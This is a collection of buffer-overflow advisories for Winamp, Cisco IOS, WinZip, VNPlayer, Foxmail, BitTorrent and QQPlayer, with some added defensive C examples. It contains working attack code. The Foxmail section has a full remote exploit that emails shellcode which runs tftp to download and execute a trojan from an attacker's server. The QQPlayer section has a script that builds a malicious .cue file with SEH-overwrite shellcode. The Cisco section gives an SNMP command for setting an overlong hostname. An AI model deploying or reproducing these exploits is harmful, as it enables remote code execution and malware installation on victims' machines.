Winamp 5.34a Security Patch Fixes Buffer Overflow Vulnerability

Date: 2023-05-09 07:53:38

This collection contains 8 pieces on the Winamp 5.34a security patch and related buffer overflow vulnerabilities.


Part 1: Winamp 5.34a Security Patch Fixes Buffer Overflow Vulnerability

The Winamp 5.34a Security Patch contains a patched in_mp4.dll (v1.22) that fixes a buffer overflow triggered when playing MP4 files under certain conditions; the flaw can corrupt memory and lead to unauthorized code execution. If you have not installed MP4 and M4A support, this patch is not needed.

Download: Winamp 5.34a Security Patch

Part 2: Cisco IOS LPD Remote Buffer Overflow Vulnerability

The LPD service in Cisco IOS has a buffer overflow when handling an overlong device name; a remote attacker could exploit it to take control of the device or cause a denial of service. The Line Printer Daemon (LPD) service provides printing in Cisco IOS. If the LPD daemon is configured, the service listens on the default LPD port, TCP 515. When a connection arrives from any source TCP port other than 515, the following error is displayed:

$ telnet 172.30.3.101 515
Trying 172.30.3.101...
Connected to 172.30.3.101 (172.30.3.101).
Escape character is '^]'.
hostname_of_the_router: /usr/lib/lpd: Malformed from address

If the hostname is 99 characters or longer, the sprintf call overflows.

Although this is technically a stack overflow, IOS allocates process stacks from heap memory, so the memory actually overwritten is heap. Because heap memory serves as the stack, on overflow the hostname can overwrite the return address stored just before the start of the character buffer; for some reason, however, no crash occurs until the buffer reaches the red zone at the heap block boundary, so after the crash and router reload the memory dump shows heap corruption.

Exploiting this vulnerability requires control of the hostname. If SNMP is running on the device and the rw community string is known (often the default, private), the hostname can be set as follows:

$ snmpset -Os -c private -v 1 10.0.0.1 system.sysName.0 s long_hostname

Recommendations:

Workarounds:

* Disable the LPD service with the no printer command.

* Configure an access list to restrict access to TCP port 515.
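As an added example (not Cisco's code), the sprintf overflow described above modelled in C beside a bounded replacement: a measurement check that reveals when the formatted error line would outgrow its buffer, and a builder that uses snprintf's return value to refuse rather than overrun. The 128-byte buffer size is an assumption; the message text is the one shown in the telnet output above.

```c
#include <stdio.h>
#include <string.h>

#define LPD_MSG_BUF 128   /* assumed size of the fixed message buffer */
#define LPD_MSG_FMT "%s: /usr/lib/lpd: Malformed from address"

/* Measure the formatted line without writing it: snprintf with a NULL buffer and
 * size 0 returns the length the full line would have (excluding the terminator). */
int lpd_message_len(const char *hostname)
{
    return snprintf(NULL, 0, LPD_MSG_FMT, hostname);
}

/* 1 if an unbounded sprintf of this hostname would run past LPD_MSG_BUF.
 * This is the check the vulnerable code never made. */
int lpd_sprintf_would_overflow(const char *hostname)
{
    return lpd_message_len(hostname) + 1 > LPD_MSG_BUF;
}

/* Bounded build: returns the line length, or -1 when the hostname does not fit,
 * in which case out holds a fixed fallback line with no hostname at all. snprintf
 * never writes past outsz, and its return value reveals the attempted overrun. */
int lpd_build_error(const char *hostname, char *out, size_t outsz)
{
    int n = snprintf(out, outsz, LPD_MSG_FMT, hostname);
    if (n < 0 || (size_t)n >= outsz) {
        snprintf(out, outsz, "%s", "/usr/lib/lpd: Malformed from address");
        return -1;
    }
    return n;
}

/* Same build into an LPD_MSG_BUF-byte local array, like the original fixed buffer. */
int lpd_build_into_fixed(const char *hostname)
{
    char buf[LPD_MSG_BUF];
    return lpd_build_error(hostname, buf, sizeof buf);
}

/* Constructed hostname of the requested length (all 'r'), at most 255 characters. */
const char *sample_hostname(size_t len)
{
    static char name[256];
    if (len > 255) len = 255;
    memset(name, 'r', len);
    name[len] = '\0';
    return name;
}
```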

Part 3: Multiple Buffer Overflow Vulnerabilities in WinZip


Affected systems:
WinZip 3.x
WinZip 6.x
WinZip 7.x
WinZip 8.x
WinZip 9.x

Vulnerability description:

WinZip has multiple potential security vulnerabilities that can compromise the user's system.

1) Several unspecified flaws can cause buffer overflows; exploiting them may lead to arbitrary code execution.

2) One issue is caused by improper validation of command-line arguments; specially crafted arguments can cause a buffer overflow and possibly arbitrary code execution.

Patch download:

www.winzip.com/upgrade.htm


Part 4: VNPlayer Buffer Overflow

The program does not validate the contents of .apl files; a malicious file causes a buffer overflow and arbitrary code execution.

Contents of the PoC file:


Drag the PoC file onto the executable.

The vulnerability triggers and calc is launched.

Part 5: Buffer Overflow Techniques

Buffer overflow technique fundamentals. To raise everyone's technical level, to give a better understanding of the technique we are discussing, and to make this forum an even better one, I am publishing below a complete series of articles on overflows and overflow attacks,

Buffer Overflow Techniques

so that everyone can better understand this thing that gets talked about every day but is not really understood. I think that after reading this, everyone

Part 6: Foxmail 5 Remote Buffer Overflow Vulnerability Advisory

Note: this was raised by an xfocus member during an internal technical exchange in February. Before that, Venustech (启明星辰) engineers had already discovered the vulnerability but had not disclosed details; after hearing of it, the xfocus member analyzed Foxmail and wrote exploit code.

Test environment: win2k sp4 + foxmail 5.0.300

When testing foxmail 4.x earlier I had found an overflow vulnerability, but I never had time to study it and set it aside. Later I heard that Foxmail 5 also had an overflow, but never saw it published. So in some free time I looked into it myself; testing showed the earlier overflow had been patched, but a new vulnerability had appeared.

The problem lies in the UrlToLocal function in PunyLib.dll, presumably a library for handling spam. When a message is classified as spam, UrlToLocal is called to process the "From: " field of the message body; a stack overflow occurs during processing and can lead to arbitrary code execution.

The processing flow is as follows:

.text:10002040        public UrlToLocal
.text:10002040 UrlToLocal   proc near
.text:10002040
.text:10002040 arg_0     = dword ptr 4
.text:10002040 arg_4     = dword ptr 8
.text:10002040
.text:10002040        mov  eax, dword_1000804C
.text:10002045        mov  ecx, dword_10008030
.text:1000204B        mov  edx, [esp+arg_4]
.text:1000204F        push  offset aHttp  ; ""
.text:10002054        push  eax
.text:10002055        mov  eax, [esp+8+arg_0]
.text:10002059        push  offset unk_10008034
.text:1000205E        push  ecx
.text:1000205F        push  edx
.text:10002060        push  eax
.text:10002061        call  sub_10002070 ; call 10002070; the argument holds the content following the "From: " field of the message body

.text:10002070 sub_10002070  proc near       ; CODE XREF: UrlToLocal+21p
.text:10002070                    ; EmailAdrToLocal+107p
.text:10002070
.text:10002070 var_600    = dword ptr -600h
.text:10002070 var_500    = dword ptr -500h
.text:10002070 var_400    = dword ptr -400h
.text:10002070 var_300    = dword ptr -300h
.text:10002070 var_200    = dword ptr -200h
.text:10002070 var_100    = dword ptr -100h
.text:10002070 arg_0     = dword ptr 4
.text:10002070 arg_4     = dword ptr 8
.text:10002070 arg_8     = dword ptr 0Ch
.text:10002070 arg_C     = dword ptr 10h
.text:10002070 arg_10     = dword ptr 14h
.text:10002070 arg_14     = dword ptr 18h
.text:10002070
.text:10002070        mov  edx, [esp+arg_0]
.text:10002074        sub  esp, 600h
......
.text:100020DF        push  eax
.text:100020E0        push  ecx
.text:100020E1        push  ebx
.text:100020E2        call  sub_10001A30 ; call 10001A30; this is the function in which the overflow occurs

.text:10001A30 sub_10001A30  proc near       ; CODE XREF: sub_10002070+72p
.text:10001A30                    ; sub_10002290+95p
.text:10001A30
.text:10001A30 var_104    = dword ptr -104h
.text:10001A30 var_100    = dword ptr -100h
.text:10001A30 arg_0     = dword ptr 4
.text:10001A30 arg_4     = dword ptr 8
.text:10001A30 arg_8     = dword ptr 0Ch
.text:10001A30 arg_C     = dword ptr 10h
.text:10001A30 arg_10     = dword ptr 14h
.text:10001A30 arg_14     = dword ptr 18h
.text:10001A30
.text:10001A30        sub  esp, 104h ; reserves a 0x104-byte stack buffer, but the copied "From: " field can be up to 0x200 bytes
.text:10001A36        push  ebx
.text:10001A37        mov  ebx, [esp+108h+arg_0]
.text:10001A3E        push  ebp
.text:10001A3F        mov  ebp, [esp+10Ch+arg_10]
.text:10001A46        push  esi
.text:10001A47        xor  esi, esi
......
.text:10001AA9        sub  edi, ecx
.text:10001AAB        mov  eax, ecx
.text:10001AAD        mov  esi, edi
.text:10001AAF        mov  edi, edx
.text:10001AB1        shr  ecx, 2
.text:10001AB4        rep movsd ; the memory copy overflows here: the "From: " field is copied by its own size into the 0x104-byte buffer
.text:10001AB6        mov  ecx, eax
.text:10001AB8        and  ecx, 3
.text:10001ABB        rep movsb
......
.text:10001AE7        mov  edi, [esp+114h+arg_C]
.text:10001AEE        shr  ecx, 2
.text:10001AF1        rep movsd ; several places here operate on local variables; since they have all been overwritten, they must be overwritten with a writable address. I used 0x7ffdf220, which should be in the PEB region, so the shellcode must later restore this region's contents to 0
.text:10001AF3        mov  ecx, eax
.text:10001AF5        and  ecx, 3
.text:10001AF8        rep movsb
......
.text:10001BD7        pop  edi
.text:10001BD8        pop  esi
.text:10001BD9        pop  ebp
.text:10001BDA        pop  ebx
.text:10001BDB        add  esp, 104h
.text:10001BE1        retn ; on return, execution goes to our JMP ESP address

This overflow cannot overwrite the SEH, and the string cannot contain characters such as "@", "(", ",", "\r", "\n". The shellcode used is the one ey4s wrote that downloads and runs an exe file via URLMON.

Some mail servers truncate the shellcode, so I changed it again to use a shorter shellcode that runs tftp directly to download and run the program. Testing showed the success rate improved somewhat, but it is easily blocked by firewalls.
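As an added example (not Foxmail's or XFocus's code), the length mismatch from the listing above in C: the caller caps the "From: " value at 0x200 bytes while the callee reserves 0x104, so a detector flags messages that would overrun, and a bounded copy has the callee check its own buffer. The header-extraction helper and the sample messages are assumptions constructed here.

```c
#include <stddef.h>
#include <string.h>

#define FROM_BUF 0x104   /* local buffer reserved by "sub esp, 104h" in sub_10001A30 */
#define FROM_MAX 0x200   /* the caller's upper bound on the copied "From: " field */

/* Locate the value of the "From: " header (assumed CRLF-terminated); returns its
 * length, 0 if absent, capped at FROM_MAX the way the caller in the listing caps it. */
static size_t from_value(const char *msg, const char **val)
{
    const char *p = strstr(msg, "From: ");
    if (p == NULL) { *val = NULL; return 0; }
    p += 6;
    const char *end = strstr(p, "\r\n");
    size_t n = end ? (size_t)(end - p) : strlen(p);
    if (n > FROM_MAX) n = FROM_MAX;
    *val = p;
    return n;
}

/* Detector: 1 if copying this field by its own length (the bug) would run past a
 * FROM_BUF-byte buffer. Assumes one byte must be left for the terminator. */
int from_would_overflow(const char *msg)
{
    const char *v;
    return from_value(msg, &v) >= FROM_BUF;
}

/* Hardened copy: the callee checks its own buffer instead of trusting the caller's
 * 0x200 cap. Returns bytes copied, or -1 with dst emptied when the field does not fit. */
int copy_from_bounded(const char *msg, char *dst, size_t dstsz)
{
    const char *v;
    size_t n = from_value(msg, &v);
    if (dstsz == 0) return -1;
    dst[0] = '\0';
    if (n + 1 > dstsz) return -1;
    if (n) memcpy(dst, v, n);   /* n < dstsz, so this cannot overrun */
    dst[n] = '\0';
    return (int)n;
}

/* Same copy into a FROM_BUF-byte local array, mirroring the original stack frame. */
int copy_from_into_frame(const char *msg)
{
    char frame[FROM_BUF];
    return copy_from_bounded(msg, frame, sizeof frame);
}

/* Constructed sample messages (not real mail). The second has a 0x150-byte
 * "From: " value: inside the caller's 0x200 cap but larger than the 0x104 buffer. */
const char *sample_benign(void)
{
    return "From: alice@example.org\r\nSubject: Hi\r\n\r\nT\r\n";
}
const char *sample_overlong(void)
{
    static char msg[0x400];
    memcpy(msg, "From: ", 6);
    memset(msg + 6, 'A', 0x150);
    strcpy(msg + 6 + 0x150, "\r\nSubject: Hi\r\n");
    return msg;
}
```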

/* fmx.c - x86/win32 Foxmail 5.0 PunyLib.dll remote stack buffer overflow exploit
 *
 * (C) COPYRIGHT XFOCUS Security Team,
 * All Rights Reserved
 *
 * This is unpublished proprietary source code of XFOCUS Security Team.
 * It should not be distributed in any form without express permission
 * from XFOCUS Security Team.
 *
 * -----------------------------------------------------------------------
 * Author  : xfocus
 *         : www.xfocus.org
 * Maintain: XFOCUS Security Team
 * Version : 0.2
 *
 * Test    : Windows server GB/XP professional
 *           + Foxmail 5.0.300.0
 * Notes   : unpublished vul.
 * Greets  : ey4s, and all member of XFOCUS Security Team.
 * Compile : cl fmx.c
 * Usage   : fmx
 *           mail_addr: email address we want to hack
 *           tftp_server: run a tftp server and have a a.exe trojan
 *           smtp_server: SMTP server don't need login, we send the email thru it
 *
 * Date    : 2004-02-27
 * Revised : 2004-03-05
 *
 * Revise History:
 * -03-05 call WinExec addr of Foxmail.exe module to run tftp for down&execute
 */
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment (lib,"ws2_32")

//mail body, it's based on a real spam email, heh
unsigned char packet[] =
"From: %s\r\n" //buffer to overrun
"Subject: Hi,man\r\n"
"MIME-Version: 1.0\r\n"
"Content-Type: multipart/mixed; boundary=\"87122827\"\r\n"
"\r\n"
"\r\n"
"--87122827\r\n"
"Content-Type: text/plain; charset=us-ascii\r\n"
"Content-Transfer-Encoding: 7bit\r\n"
"\r\n"
"T\r\n"
"\r\n"
"--87122827\r\n"
"Content-Disposition: attachment\r\n"
"Content-Type: Text/HTML;\r\n"
" name=\"girl.htm\"\r\n"
"Content-Transfer-Encoding: 7bit\r\n"
"\r\n"
"\r\n"
"--87122827--\r\n"
"\r\n"
".\r\n";

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.300)
unsigned char winexec[] =
"\x83\xec\x50\xeb\x0c\xb9\x41\x10\xd3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff";

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)
unsigned char winexec2[] =
"\x83\xec\x50\xeb\x0c\xb9\x41\x10\xa3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff";

#define SMTPPORT 25

int Make_Connection(char *address,int port,int timeout);
int SendXMail(char *mailaddr, char *tftp, char *smtpserver, char *shellcode);

int main(int argc, char * argv[])
{
    WSADATA WSAData;
    char *mailaddr = NULL;
    char *tftp = NULL;
    char *smtpserver = NULL;

    if(argc!=4)
    {
        printf("Usage: %s \ne.g.:%s eeye@hack.com 202.2.3.4 219.3.2.1\n", argv[0], argv[0]);
        return 1;
    }
    mailaddr=argv[1];
    tftp=argv[2];
    smtpserver=argv[3];

    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }

    //WinExec() address
    SendXMail(mailaddr, tftp, smtpserver, (char *)winexec);  //WinExec() address in Foxmail.exe module(foxmail 5.0.300)
    SendXMail(mailaddr, tftp, smtpserver, (char *)winexec2); //WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)

    WSACleanup();
    return 0;
}

// Establish a TCP connection
// Input:
//   char * address  IP address
//   int port        port
//   int timeout     timeout
// Output:
// Return:
//   success >0
//   error   <=0
int Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s==INVALID_SOCKET)   // SOCKET is unsigned, so a "< 0" test can never fire
        return -1;
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    if(target.sin_addr.s_addr==INADDR_NONE)   // inet_addr() signals a bad address with INADDR_NONE
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctlsocket(s,FIONBIO,&bf);   // non-blocking connect so the timeout below applies
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        closesocket(s);
        return -3;
    }
    if(i==0)
    {
        closesocket(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        closesocket(s);
        return -5;
    }
    ioctlsocket(s,FIONBIO,&bf);   // bf is 0 here: back to blocking mode
    return s;
}

//send magic mail
int SendXMail(char *mailaddr, char *tftp, char *smtpserver, char *shellcode)
{
    SOCKET csock;
    int ret,i=0;
    char buf[510], sbuf[0x10000], tmp[500], tmp1[500];

    csock = Make_Connection(smtpserver, SMTPPORT, 10);
    if(csock<0)
    {
        printf("connect err.\n");
        exit(1);
    }

    // each reply is read into buf; sizeof(buf)-1 keeps the read inside the buffer
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, sizeof(buf)-1, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf("%s", buf);

    ret=send(csock, "HELO server\r\n",strlen("HELO server\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, sizeof(buf)-1, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf("%s", buf);

    ret=send(csock, "MAIL FROM: info@sina.com\r\n",strlen("MAIL FROM: info@sina.com\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, sizeof(buf)-1, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf("%s", buf);

    sprintf(tmp, "RCPT TO: %s\r\n", mailaddr);
    ret=send(csock, tmp,strlen(tmp), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, sizeof(buf)-1, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf("%s", buf);

    Sleep(1000);
    ret=send(csock, "DATA\r\n",strlen("DATA\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, sizeof(buf)-1, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf("%s", buf);

    printf("send exploit mail...\n");
    memset(sbuf, 0, sizeof(sbuf));
    memset(buf, 0, sizeof(buf));
    memset(buf, 0x41, sizeof(buf)-1);
    memset(tmp, 0, sizeof(tmp));
    //strcpy(tmp, winexec);//WinExec() address in Foxmail.exe module(foxmail 5.0.300)
    strcpy(tmp, shellcode);//WinExec() address in Foxmail.exe module
    strcat(tmp, "cmd /c tftp -i %s get a.exe&a.exe:");
    sprintf(tmp1, tmp, tftp);
    memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1));
    *(int *)(buf+0x100)=0x7ffa54cd; //ret addr jmp esp
    *(int *)(buf+0x104)=0x80eb80eb; //jmp back
    *(int *)(buf+0x108)=0x7ffdf220; //writeable addr
    *(int *)(buf+0x110)=0x7ffdf220; //writeable addr
    memcpy(buf, "girl\x0d", 5);
    sprintf(sbuf, (char *)packet, buf);
    ret=send(csock, sbuf,strlen(sbuf), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, sizeof(buf)-1, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf("%s", buf);
    printf("exploit mail sent.\n");
    closesocket(csock);
    return 0;
}

XFocus (安全焦点)

Part 7: BitTorrent and uTorrent Peers Window Buffer Overflow Vulnerability

This is a client-side issue in widely used software.

Affected systems:
BitTorrent BitTorrent <= 6.0 (build 5535)
BitTorrent uTorrent <= 1.8-alpha-7834
BitTorrent uTorrent <= 1.7.5 (build 4602)

Unaffected systems:
BitTorrent uTorrent 1.7.6 (build 7859)

Description:

BitTorrent and uTorrent are popular clients for the bittorrent protocol and share the same code base.

The BitTorrent and uTorrent implementations contain a buffer overflow vulnerability that a remote attacker could exploit to take control of the user's client.

Both the BitTorrent and uTorrent clients have a Detailed Info window enabled in the General section, which reports status information about the torrent and tracker in use. The Peers section of the same General window displays information about connected clients, such as torrent share ratio and IP address. When the user views this window, the connected client's software version Unicode string is copied with wcscpy into a relatively static buffer for display in the GUI. If that string is overlong, a buffer overflow can be triggered, leading to denial of service or execution of arbitrary instructions. To exploit this vulnerability, an external attacker must connect to the random port opened by the client and send an overlong client version together with the SHA1 hash of the torrent currently in use.

Vendor patch:

The vendor has released an upgrade patch to fix this security issue; download it from the vendor's home page:

download.utorrent.com/1.7.6/utorrent.exe

Part 8: QQPlayer CUE File Buffer Overflow Vulnerability Advisory

#!/usr/bin/env python
#################################################################
#
# Title: QQPlayer cue File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer<=2.3.696.400p1
#
#################################################################
# Code :
head = '''FILE "'''
junk = "A" * 780
nseh = "\x42\x61\x21\x61"
seh = "\xa9\x9e\x41\x00"
adjust = "\x32\x42\x61\x33\xca\x83\xc0\x10"
shellcode = ("hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o"
             "0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41"
             "H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK"
             "NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01")
junk_ = "R" * 8000
foot = '''.avi" VIDEO''' + "\x0a" + '''TRACK 02 MODE1/8888''' + "\x0a" + "INDEX 08 08:08:08"
payload = head + junk + nseh + seh + adjust + shellcode + junk_ + foot
fobj = open("poc.cue", "w")
fobj.write(payload)
fobj.close()
